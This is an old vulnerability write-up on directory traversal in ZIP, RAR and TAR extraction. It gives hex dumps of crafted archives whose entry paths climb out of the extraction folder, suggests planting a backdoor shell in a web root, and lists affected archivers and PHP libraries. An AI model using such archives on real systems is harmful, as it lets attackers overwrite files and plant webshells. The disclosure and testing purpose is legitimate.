Directory traversal vulnerabilities in .zip .tar .rar 

Author :
The information has been provided by Hamid Ebadi
contact :  Hamid Network Security Team  : admin@hamid.ir
The original article can be found at : http://hamid.ir

keywork:

tar,zip,rar,jar,gz.tar,gz,Directory traversal,vulnerabilities,compress,extract

Summary :

What is file compression?
Compression works by eliminating or minimizing redundancy in a file, making your files smaller without losing any information. Every character on your computer, every letter, digit and punctuation mark, is actually made up of several characters that make up computer code. A simple example of compression is: If you have a set of characters "AAAADDDDDDD" representing a letter, one type of compression software can rewrite this as "4A7D", saving seven spaces and making that line 64% smaller. Compression software uses algorithms to do this.

 
What is an archive?
Think of an archive as the container that holds your compressed files. An archive can contain a single file or many files, which can be in many folders inside the archive. Each archive is a single document, just like a word processing document, graphics file or database.many program  allows you to protect your files by encrypting them in a password. When you encrypt items as they are being added to an archive, only people with the correct password can expand and open them.[StuffIt]

in this paper we talk about Directory traversal vulnerabilities while processing (extract) .tar .rar .zip  and create a simple tools to test and exploit this kind of security Bug !!
what is the problem ?
compressed file (rar,zip,tar,gzip,ace,... ) are -commonly- known as safe format like .mpeg and .wmf but in
years 2005 and 2006 hacker show that they can use this SAFE!!! file format to excute their command and ... but can compressed file be harmful ? YES, maybe "buffer overflow" or  "format string" in archivers processing 
but in this paper we just talk about  "Directory traversal" and we create  simple tools to check archivers program .

What is  Directory traversal in archivers?
that allowed one to create malicous archive files, which would overwrite system files or place dangerous files in defined directory(example : shell.php in wwwroot directory)
This could be abused by sending an archive to a local user who would unzip / untar an archive, the archive would then be able to overwrite any file to which the user has write permissions, thus it could also be abused if a system ran som antivirus software which automatically opened archive files.

writing simple scanner ?
we create folder AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
contain hamid.txt
in this file we just type simple text like  "hamid"
and compress this file using diffrent compression format (rar,tar,zip)
(I use WINZIP 10.0 & WinAce)
and open this file [aaaa...a].rar with simple hex editor (Hex Workshop or WinHex or ...)
=--------------------------------------------------------------------=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.rar

00000000 5261 7221 1A07 00CF 9073 0000 0D00 0000 Rar!.....s......
00000010 0000 0000 7990 74E0 8064 0000 0000 0000 ....y.t..d......
00000020 0000 0002 0000 0000 9C43 4E34 1430 4400 .........CN4.0D.
00000030 1000 0000 4141 4141 4141 4141 4141 4141 ....AAAAAAAAAAAA
00000040 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000050 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000060 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000070 4141 4141 4141 4141 7D31 7420 806E 0005 AAAAAAAA}1t .n..
00000080 0000 0005 0000 0002 2B76 1552 EC43 4E34 ........+v.R.CN4
00000090 1D30 4E00 2000 0000 4141 4141 4141 4141 .0N. ...AAAAAAAA
000000A0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000B0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000C0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000D0 4141 4141 4141 4141 4141 4141 5C68 616D AAAAAAAAAAAA\ham
000000E0 6964 2E74 7874 6861 6D69 64C4 3D7B 0040 id.txthamid.={.@
000000F0 0700                                    ..
=--------------------------------------------------------------------=
every thing is clear in this rar file ,first we create folder [AAAA....A] and then create [AAAA....A]/hamid.txt  and write "hamid" in the file.
(winrar decide not to compress word "hamid" because it's too short)
what happen if we change 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/hamid.txt
to 
/../../../../../../../../../../../../../../../..///windows/system32/hamid.txt
or 
/../../../../../../../../../../../../../../../../[path to wwwroot or ..]/backdoorshell.[asp|php]

well,just change it to /../../../../../../../../../../../../../../../../../../../../hacked/hamid.txt
and save it as hamidrartester.rar 
=--------------------------------------------------------------------=
hamidrartester.rar 

00000000 5261 7221 1A07 00CF 9073 0000 0D00 0000 Rar!.....s......
00000010 0000 0000 7990 74E0 8064 0000 0000 0000 ....y.t..d......
00000020 0000 0002 0000 0000 9C43 4E34 1430 4400 .........CN4.0D.
00000030 1000 0000 4141 4141 4141 4141 4141 4141 ....AAAAAAAAAAAA
00000040 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000050 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000060 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000070 4141 4141 4141 4141 7D31 7420 806E 0005 AAAAAAAA}1t .n..
00000080 0000 0005 0000 0002 2B76 1552 EC43 4E34 ........+v.R.CN4
00000090 1D30 4E00 2000 0000 2F2E 2E2F 2E2E 2F2E .0N. .../../../.
000000A0 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E ./../../../../..
000000B0 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F /../../../../../
000000C0 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E ../../../../../.
000000D0 2E2F 2E2E 2F2F 6861 636B 6564 2F68 616D ./..//hacked/ham
000000E0 6964 2E74 7874 6861 6D69 64C4 3D7B 0040 id.txthamid.={.@
000000F0 0700                                    ..

=--------------------------------------------------------------------=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zip

00000000 504B 0304 0A00 0000 0000 EC43 4E34 2B76 PK.........CN4+v
00000010 1552 0500 0000 0500 0000 4E00 0000 4141 .R........N...AA
00000020 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000030 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000040 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000050 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000060 4141 2F68 616D 6964 2E74 7874 6861 6D69 AA/hamid.txthami
00000070 6450 4B03 040A 0000 0000 009C 434E 3400 dPK.........CN4.
00000080 0000 0000 0000 0000 0000 0045 0000 0041 ...........E...A
00000090 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000A0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000B0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000C0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000D0 4141 412F 504B 0102 1400 0A00 0000 0000 AAA/PK..........
000000E0 EC43 4E34 2B76 1552 0500 0000 0500 0000 .CN4+v.R........
000000F0 4E00 0000 0000 0000 0100 2000 0000 0000 N......... .....
00000100 0000 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
00000110 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000120 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000130 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000140 4141 4141 4141 2F68 616D 6964 2E74 7874 AAAAAA/hamid.txt
00000150 504B 0102 1400 0A00 0000 0000 9C43 4E34 PK...........CN4
00000160 0000 0000 0000 0000 0000 0000 4500 0000 ............E...
00000170 0000 0000 0000 1000 0000 7100 0000 4141 ..........q...AA
00000180 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000190 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001A0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001B0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001C0 4141 2F50 4B05 0600 0000 0002 0002 00EF AA/PK...........
000001D0 0000 00D4 0000 0000 0000                .........
=--------------------------------------------------------------------=
hamidziptester.zip

00000000 504B 0304 0A00 0000 0000 EC43 4E34 2B76 PK.........CN4+v
00000010 1552 0500 0000 0500 0000 4E00 0000 2F2E .R........N.../.
00000020 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E ./../../../../..
00000030 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F /../../../../../
00000040 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E ../../../../../.
00000050 2E2F 2E2E 2F2E 2E2F 2E2E 2F2F 6861 636B ./../../..//hack
00000060 6564 2F68 616D 6964 2E74 7874 6861 6D69 ed/hamid.txthami
00000070 6450 4B03 040A 0000 0000 009C 434E 3400 dPK.........CN4.
00000080 0000 0000 0000 0000 0000 0045 0000 0041 ...........E...A
00000090 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000A0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000B0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000C0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000D0 4141 412F 504B 0102 1400 0A00 0000 0000 AAA/PK..........
000000E0 EC43 4E34 2B76 1552 0500 0000 0500 0000 .CN4+v.R........
000000F0 4E00 0000 0000 0000 0100 2000 0000 0000 N......... .....
00000100 0000 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E ../../../../../.
00000110 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E ./../../../../..
00000120 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F /../../../../../
00000130 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2F ../../../../..//
00000140 6861 636B 6564 2F68 616D 6964 2E74 7874 hacked/hamid.txt
00000150 504B 0102 1400 0A00 0000 0000 9C43 4E34 PK...........CN4
00000160 0000 0000 0000 0000 0000 0000 4500 0000 ............E...
00000170 0000 0000 0000 1000 0000 7100 0000 4141 ..........q...AA
00000180 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000190 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001A0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001B0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001C0 4141 2F50 4B05 0600 0000 0002 0002 00EF AA/PK...........
000001D0 0000 00D4 0000 0000 0000                .........


i create this tools and you just need to test your archiver and see the result 
i also attach simple tool to calculate TAR header checksum .
you can download this tools from http://hamid.ir --> Hamid Network Security Team .

(ZIP),(RAR),(TAR),(GZ),(JAR),(TAR.GZ)

Example:
[WinZIP]
I test it on winzip 10.0 and i get this Warning as result :
=--------------------------------------------------------------------=
Warning: One or more of the files in this archives uses ".." (parent folder) as part of its folder information.
This is very unusual in archives and can produce undesirable and potentially dangerous results,including the overwriting of importent system files.You should carefully review the content of the archive in Winzip's classic mode before extracting,espacially if you are uncertain about the archive's source.
Do you want to open this archive? YES  NO
=--------------------------------------------------------------------=

and if you press YES , you trigger an Directory traversal vulnerability and you can find hamid.txt in X:\hacked\
winzip and winrar patch their bug (but i am sure still many people click on YES as i test  (-:  )
old version of winzip  have Directory traversal vulnerability while extracting TAR file 
(I successfully test on Win Zip 8.0 ,NO warning or notification )


========================
 [PclZip Library]
Archive_Zip (Zip file management class)
Archive_Tar (Tar file management class)
about PclZip author :
Author: Vincent Blavet  vincent@blavet.net
http://www.phpconcept.net
http://pear.php.net/user/vblavet
http://www.zend.com/person.php?handle=vblavet

http://www.zend.com/pear/whoiswho.php?pkg=Archive_Tar
http://pear.php.net/package/Archive_Tar

This class provides handling of tar files in PHP.
It supports creating, listing, extracting and adding to tar files.
Gzip support is available if PHP has the zlib extension built-in or
loaded. Bz2 compression is also supported with the bz2 extension loaded.


http://pear.php.net/package/Archive_Zip
http://www.zend.com/pear/whoiswho.php?pkg=Archive_Zip
This class provides handling of zip files in PHP.
It supports creating, listing, extracting and adding to zip files.

i test this bug in mambo .

my quick google search about PclZip :
http://ftp.debian.org/debian/pool/main/libp/libphp-pclzip/
http://packages.debian.org/unstable/source/libphp-pclzip
mambo:http://mamboserver.com/
joomla:htp://www.joomla.org
moodle:http://moodle.org
net2ftp:http://www.net2ftp.com
Portix :http://www.portix.be/
claroline:http://www.claroline.net
pivot:http://www.pivotlog.net
PhpGedView: http://phpgedview.net 
PhpZip: http://phpzip.sourceforge.net/
PHP-Fusion: http://www.php-fusion.co.uk
xoops:http://xoopscube.org/
Invision Gallery:http://invisionpower.com
atutor:http://www.atutor.ca

Directory traversal while extracting (ZIP) & (TAR)



========================
SpeedCommander 11.0
ZipStar 5.1
Squeez 5.1

Version 11.01.4450 
http://www.speedproject.de
for Windows NT/2000/XP 
Directory traversal while extracting (JAR) (ZIP )



========================
WinAce Archiver v2.6
ACE Cmpression Software & e-merge GmbH
www.winace.com
Directory traversal while extracting (RAR),(TAR)


========================
The StuffIt and ZipMagic Family of products is designed to meet any level of compression needs; from basic expansion to advanced archive manipulation,
to automating routine compression tasks, and even building compression into a software application. Scan the list of products below to find just the right StuffIt for you! 
StuffIt Standard 9.0 
StuffIt Deluxe 9.0 
ZipMagic Deluxe 9.0
StuffIt Expander 

9.0.0.21 Engine 9.0.0.21
www.stuffit.com
Directory traversal while extracting (TAR),(ZIP)


========================



